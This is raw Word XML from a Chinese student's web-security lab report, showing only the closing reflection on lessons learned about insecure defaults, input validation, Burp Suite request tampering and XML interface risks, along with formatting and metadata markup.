        <w:t>代码安全审计的核心思路。以往仅知晓漏洞利用方法，本次实训从底层原理、代码缺陷、接口交互多个维度吃透了漏洞本质，明白了漏洞产生的核心是开发默认</w:t>
      </w:r>
      <w:r w:rsidR="007F3516" w:rsidRPr="007F3516">
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>不安全</w:t>
      </w:r>
      <w:r>
        <w:t>配置与输入无</w:t>
      </w:r>
      <w:r w:rsidR="007F3516" w:rsidRPr="007F3516">
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>过滤校验</w:t>
      </w:r>
      <w:r>
        <w:t>导致。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A3668" w14:textId="1866F2D2" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>同时掌握了</w:t>
      </w:r>
      <w:r>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:t>抓包、改包、请求方法篡改的实操技巧，区分了</w:t>
      </w:r>
      <w:r w:rsidR="007F3516">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>POS</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>请求的安全差异，认识到企业级</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>接口的安全风险。在后续的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>安全学习中，我会更加关注底层代码配置缺陷，重视默认安全配置的风险，养成先审计代码、再分析漏洞的安全思维，掌握对应的安全防护思路，提升</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>安全审计与漏洞防御能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E5FE90" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00EB2F43">
      <w:footerReference w:type="default" r:id="rId12"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="2098" w:right="1474" w:bottom="1984" w:left="1587" w:header="851" w:footer="850" w:gutter="0"/>
      <w:pgNumType w:fmt="numberInDash" w:start="1"/>
      <w:cols w:space="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5A01FA" w14:textId="77777777" w:rsidR="00F40ABC" w:rsidRDefault="00F40ABC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="091535E2" w14:textId="77777777" w:rsidR="00F40ABC" w:rsidRDefault="00F40A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F9F942" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
    <w:pPr>
      <w:pStyle w:val="a5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6C6E11" wp14:editId="44C76DB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1384713516"/>
                          </w:sdtPr>
                          <w:sdtEndPr/>
                          <w:sdtContent>
                            <w:p w14:paraId="31C838AE" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
                              <w:pPr>
                                <w:pStyle w:val="a5"/>
                                <w:jc w:val="center"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="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="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="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宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                  <w:lang w:val="zh-CN"/>
                                </w:rPr>
                                <w:t>3</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia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69333E14" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43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6C6E11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sdt>
                    <w:sdtPr>
                      <w:id w:val="-1384713516"/>
                    </w:sdtPr>
                    <w:sdtEndPr/>
                    <w:sdtContent>
                      <w:p w14:paraId="31C838AE" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
                        <w:pPr>
                          <w:pStyle w:val="a5"/>
                          <w:jc w:val="center"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="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="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                          </w:rPr>
                          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="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="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:lang w:val="zh-CN"/>
                          </w:rPr>
                          <w:t>3</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia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 w14:paraId="69333E14" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43"/>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap anchorx="margin"/>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
  </w:p>
  <w:p w14:paraId="27DBFC45" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F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AB9440" w14:textId="77777777" w:rsidR="00F40ABC" w:rsidRDefault="00F40ABC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="33E6C346" w14:textId="77777777" w:rsidR="00F40ABC" w:rsidRDefault="00F40A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6C8C038"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F6C8C03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mUxZjhhYzVlZTc0MDdmNWRiNTI3ZWEwNmJmZTE0OTkifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00172A27"/>
    <w:rsid w:val="0001465B"/>
    <w:rsid w:val="00031CD4"/>
    <w:rsid w:val="000C3922"/>
    <w:rsid w:val="000E536A"/>
    <w:rsid w:val="00130FAD"/>
    <w:rsid w:val="00144336"/>
    <w:rsid w:val="00172A27"/>
    <w:rsid w:val="001F4376"/>
    <w:rsid w:val="00234C95"/>
    <w:rsid w:val="002669CC"/>
    <w:rsid w:val="002A778F"/>
    <w:rsid w:val="002D406F"/>
    <w:rsid w:val="002D5E8C"/>
    <w:rsid w:val="002E1906"/>
    <w:rsid w:val="0036325A"/>
    <w:rsid w:val="003E4859"/>
    <w:rsid w:val="00463664"/>
    <w:rsid w:val="00464452"/>
    <w:rsid w:val="005537AB"/>
    <w:rsid w:val="00576FAB"/>
    <w:rsid w:val="006654FD"/>
    <w:rsid w:val="006859A0"/>
    <w:rsid w:val="006B656C"/>
    <w:rsid w:val="00794702"/>
    <w:rsid w:val="007F3516"/>
    <w:rsid w:val="008072F6"/>
    <w:rsid w:val="00835DB2"/>
    <w:rsid w:val="008721FD"/>
    <w:rsid w:val="008868A3"/>
    <w:rsid w:val="008C3E7F"/>
    <w:rsid w:val="008D23D8"/>
    <w:rsid w:val="00924BE4"/>
    <w:rsid w:val="0093264C"/>
    <w:rsid w:val="009378FD"/>
    <w:rsid w:val="009546BC"/>
    <w:rsid w:val="009C3624"/>
    <w:rsid w:val="00A47DAE"/>
    <w:rsid w:val="00A70B26"/>
    <w:rsid w:val="00AF2D87"/>
    <w:rsid w:val="00AF3C0B"/>
    <w:rsid w:val="00B90EED"/>
    <w:rsid w:val="00BC4EBF"/>
    <w:rsid w:val="00BD7BB0"/>
    <w:rsid w:val="00C4190F"/>
    <w:rsid w:val="00C50F2B"/>
    <w:rsid w:val="00C52BC1"/>
    <w:rsid w:val="00CE337A"/>
    <w:rsid w:val="00D93244"/>
    <w:rsid w:val="00DA05DC"/>
    <w:rsid w:val="00E0111D"/>
    <w:rsid w:val="00EA4DC5"/>
    <w:rsid w:val="00EB2F43"/>
    <w:rsid w:val="00EC252E"/>
    <w:rsid w:val="00F071C4"/>
    <w:rsid w:val="00F1666B"/>
    <w:rsid w:val="00F40ABC"/>
    <w:rsid w:val="00F62277"/>
    <w:rsid w:val="00F73FEB"/>
    <w:rsid w:val="00F921F6"/>
    <w:rsid w:val="00FE28D7"/>
    <w:rsid w:val="00FE2C1D"/>
    <w:rsid w:val="021C6624"/>
    <w:rsid w:val="0B7A38A7"/>
    <w:rsid w:val="0BED2848"/>
    <w:rsid w:val="0D4F26BF"/>
    <w:rsid w:val="0D6D2037"/>
    <w:rsid w:val="0D7257D0"/>
    <w:rsid w:val="0DF6702C"/>
    <w:rsid w:val="0E8C6EF5"/>
    <w:rsid w:val="0EAC6E81"/>
    <w:rsid w:val="0EF07DF3"/>
    <w:rsid w:val="10BB0DE7"/>
    <w:rsid w:val="10D46218"/>
    <w:rsid w:val="10EC5E29"/>
    <w:rsid w:val="12D57C90"/>
    <w:rsid w:val="170608F7"/>
    <w:rsid w:val="17981E51"/>
    <w:rsid w:val="17DF0111"/>
    <w:rsid w:val="19C66901"/>
    <w:rsid w:val="1B2C4A6E"/>
    <w:rsid w:val="1B75435D"/>
    <w:rsid w:val="1D1853AF"/>
    <w:rsid w:val="20273C62"/>
    <w:rsid w:val="216058A9"/>
    <w:rsid w:val="21E73573"/>
    <w:rsid w:val="2562197E"/>
    <w:rsid w:val="280A06C0"/>
    <w:rsid w:val="28515B77"/>
    <w:rsid w:val="2CD10A37"/>
    <w:rsid w:val="2DAF3B63"/>
    <w:rsid w:val="2E937F98"/>
    <w:rsid w:val="2EAC7A84"/>
    <w:rsid w:val="2EF9304D"/>
    <w:rsid w:val="2F9D6C07"/>
    <w:rsid w:val="337C05A1"/>
    <w:rsid w:val="33965C26"/>
    <w:rsid w:val="34940C10"/>
    <w:rsid w:val="36D61BC6"/>
    <w:rsid w:val="393D2C48"/>
    <w:rsid w:val="3B105B9D"/>
    <w:rsid w:val="3B360EA6"/>
    <w:rsid w:val="3D6407A3"/>
    <w:rsid w:val="3DB249C8"/>
    <w:rsid w:val="3E182BFB"/>
    <w:rsid w:val="3EB865DA"/>
    <w:rsid w:val="417B4467"/>
    <w:rsid w:val="41FA1EF1"/>
    <w:rsid w:val="42C7755A"/>
    <w:rsid w:val="44556C65"/>
    <w:rsid w:val="46E65808"/>
    <w:rsid w:val="47642B67"/>
    <w:rsid w:val="47AE587F"/>
    <w:rsid w:val="48820C3A"/>
    <w:rsid w:val="49012912"/>
    <w:rsid w:val="4CF13F50"/>
    <w:rsid w:val="4E2D6403"/>
    <w:rsid w:val="4E324336"/>
    <w:rsid w:val="4E5B273A"/>
    <w:rsid w:val="4EA81E3C"/>
    <w:rsid w:val="4EB62B4A"/>
    <w:rsid w:val="4F5E1B10"/>
    <w:rsid w:val="512E4AF8"/>
    <w:rsid w:val="522357B7"/>
    <w:rsid w:val="53430B72"/>
    <w:rsid w:val="54A537BB"/>
    <w:rsid w:val="562B368E"/>
    <w:rsid w:val="565C1F84"/>
    <w:rsid w:val="582D1C36"/>
    <w:rsid w:val="58B359BE"/>
    <w:rsid w:val="593C3DF6"/>
    <w:rsid w:val="5A235B8F"/>
    <w:rsid w:val="5BCF27BE"/>
    <w:rsid w:val="5CB31D71"/>
    <w:rsid w:val="5CF16DE4"/>
    <w:rsid w:val="5FC6554C"/>
    <w:rsid w:val="608260E1"/>
    <w:rsid w:val="60C70EC5"/>
    <w:rsid w:val="62F321E2"/>
    <w:rsid w:val="636D04FB"/>
    <w:rsid w:val="64D218A7"/>
    <w:rsid w:val="65527BF9"/>
    <w:rsid w:val="67EB51A1"/>
    <w:rsid w:val="6A214490"/>
    <w:rsid w:val="6C08035C"/>
    <w:rsid w:val="6E945C5E"/>
    <w:rsid w:val="6EA7546C"/>
    <w:rsid w:val="6EDF18F0"/>
    <w:rsid w:val="70E400C1"/>
    <w:rsid w:val="71E54313"/>
    <w:rsid w:val="72F86678"/>
    <w:rsid w:val="75295853"/>
    <w:rsid w:val="758D2002"/>
    <w:rsid w:val="75D11028"/>
    <w:rsid w:val="77011514"/>
    <w:rsid w:val="79297478"/>
    <w:rsid w:val="7D2E379F"/>
    <w:rsid w:val="7F732B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BA9AC12"/>
  <w15:docId w15:val="{363E1BD8-E6ED-4953-BA03-C4DE48E16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Theme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBid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8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24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="007F35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778</Words>
  <Characters>4436</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>36</Lines>
  <Paragraphs>10</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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伊思默</dc:creator>
  <cp:lastModifiedBy>LTSC</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <cp:lastPrinted>2024-09-26T04:01:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-18T06:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-26T12:38:00Z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2E98FE4E72C24922AD49AE8BF83CAF64_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiN2U5ZDE1ZGIxZDg3OWNhMGU0YjJiZmZiOTc2ZGQxMGEiLCJ1c2VySWQiOiIyNDUwMjQ2ODMifQ==</vt:lpwstr>
  </property>
</Properties>
</file>